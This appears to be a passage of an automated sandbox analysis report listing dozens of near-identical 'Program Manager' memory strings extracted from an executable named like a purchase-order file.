Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLM
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qll
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLL
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,,
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,V
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,U
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLt
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,T
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLr
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp%
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp$
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,I
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLh
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,G
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLf
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLd
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,B
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLq
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,Q
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLp
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,P
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,N
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,K
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,y
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,u
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,t
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,r
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpC
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpA
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,}
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,{
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp-
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,i
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,f
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,d
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp2
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh]
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH<
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH;
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhY
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH9
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhE
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q${
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH+
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhJ
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(5
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(4
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(3
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHR
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(1
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHQ
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qho
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHN
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhn
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\_
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhw
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHD
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q($
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHA
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh`
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH@
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh_
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhm
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHM
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q('
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(U
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHr
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHp
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q([
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(Z
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHx
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHw
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHv
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(V
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(E
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHd
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHb
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(B
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHm
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHk
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHi
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(I
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(G
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(t
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL~
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql6
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql4
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql2
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q({
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(y
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(w
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql)
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql&
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql%
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql$
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(k
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql.
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(i
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql*
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD1
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD.
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD!
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd?
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd>
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd=
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD#
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDQ
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$1
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdo
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDO
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDN
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$,
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$*
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0*
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDW
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$6
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDU
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDS
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$3
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$2
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdr
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD@
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd^
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd]
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002E57000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD;
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd[
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDH
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDG
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdf
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDF
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$&
